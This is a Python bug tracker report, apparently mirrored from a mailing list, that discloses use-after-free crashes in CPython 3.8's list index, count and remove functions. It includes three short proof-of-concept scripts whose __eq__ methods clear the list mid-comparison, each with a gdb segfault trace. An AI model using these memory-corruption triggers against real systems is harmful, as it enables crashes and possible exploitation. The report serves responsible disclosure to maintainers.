New submission from LCatro <m4i1f0rt...@sina.cn>:
Code 1 : static PyObject * list_index_impl(PyListObject *self, PyObject *value, Py_ssize_t start, Py_ssize_t stop) // ... for (i = start; i < stop && i < Py_SIZE(self); i++) { int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ); <= self->ob_item[i] can uaf .. PoC : class rewrite_list_eq(list) : def __eq__(self,other) : str(other) # <== that will call the object recall function tp_repr and call it .. return NotImplemented class poc() : def __eq__(self,other) : list1.clear() return NotImplemented list1 = [ poc() ] list1.index(list1) # list_index_impl() -> PyObject_RichCompareBool() Crash Report : (gdb) run ../py_poc/list_poc_3.py The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_3.py [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573 573 if (Py_TYPE(v)->tp_str == NULL) ===== Code 2 : static PyObject * list_count(PyListObject *self, PyObject *value) { Py_ssize_t count = 0; Py_ssize_t i; for (i = 0; i < Py_SIZE(self); i++) { int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ); // <= PoC : class rewrite_list_eq(list) : def __eq__(self,other) : str(other) return NotImplemented class poc() : def __eq__(self,other) : list1.clear() return NotImplemented list1 = rewrite_list_eq([ poc() ]) list1.count(list1) # list_count() -> PyObject_RichCompareBool() Crash Report : (gdb) run ../py_poc/list_poc_4.py The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_4.py [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573 573 if (Py_TYPE(v)->tp_str == NULL) === Code 3 : static PyObject * list_remove(PyListObject *self, PyObject *value) /*[clinic end generated code: output=f087e1951a5e30d1 input=2dc2ba5bb2fb1f82]*/ { Py_ssize_t i; for (i = 0; i < Py_SIZE(self); i++) { Py_INCREF(self->ob_item[i]); int cmp = PyObject_RichCompareBool(self->ob_item[i], value, Py_EQ); PoC : class rewrite_list_eq(list) : def __eq__(self,other) : str(other) return NotImplemented class poc() : def __eq__(self,other) : list1.clear() return NotImplemented list1 = rewrite_list_eq([ poc() ]) list1.remove(list1) # list_count() -> PyObject_RichCompareBool() Crash Report : (gdb) run ../py_poc/list_poc_5.py Starting program: /tangjitao/Python-3.8.0/python ../py_poc/list_poc_5.py [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. PyObject_Str (v=0x7ffff6e82d20) at Objects/object.c:573 573 if (Py_TYPE(v)->tp_str == NULL) ---------- components: Interpreter Core messages: 355513 nosy: LCatro, serhiy.storchaka priority: normal severity: normal status: open title: use-after-free in list object function type: crash versions: Python 3.8 _______________________________________ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue38610> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com